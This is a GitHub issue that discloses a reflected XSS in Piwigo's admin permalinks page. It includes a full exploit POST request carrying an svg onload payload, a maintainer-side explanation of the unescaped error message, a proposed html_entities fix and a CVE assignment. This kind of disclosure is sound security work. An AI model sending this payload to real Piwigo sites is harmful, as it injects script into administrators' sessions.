Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS in /admin.php?page=permalinks #1158

Open
matuhn opened this issue Feb 12, 2020 · 3 comments
Open

XSS in /admin.php?page=permalinks #1158

matuhn opened this issue Feb 12, 2020 · 3 comments

Comments

@matuhn
Copy link

matuhn commented Feb 12, 2020

Hi team!

I found a XSS in XSS in /admin.php?page=permalinks

Exploit Request:

POST /piwigo/piwigo/admin.php?page=permalinks HTTP/1.1
Host: 192.168.10.138
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Origin: http://192.168.10.138
Connection: close
Referer: http://192.168.10.138/piwigo/piwigo/admin.php?page=permalinks
Cookie: pwg_id=ragm92nc6a3rr532fi0h9h6f21
Upgrade-Insecure-Requests: 1

cat_id=3&permalink=%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&save=on&set_permalink=Submit&pwg_token=2048f9dd482aaca003e193045fd4f763

PoC:

@matuhn
Copy link
Author

matuhn commented Feb 12, 2020

@plegall please check this!

@cpol0
Copy link

cpol0 commented Apr 19, 2021

Hi,
the issue is located in the set_cat_permalink function. The special "xss permalink" is detected as a bad permalink and so the function return immediately with an error message.
This is exactly at this point that the XSS occurs, the $permalink variable is displayed with an error message without escaping, which leads to the XSS.

A simple html_entities fix the issue. PR coming soon.

cpol0 pushed a commit to cpol0/Piwigo that referenced this issue Apr 19, 2021
@fgeek
Copy link

fgeek commented Dec 7, 2021

https://nvd.nist.gov/vuln/detail/CVE-2020-22150 has been assigned for this issue.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants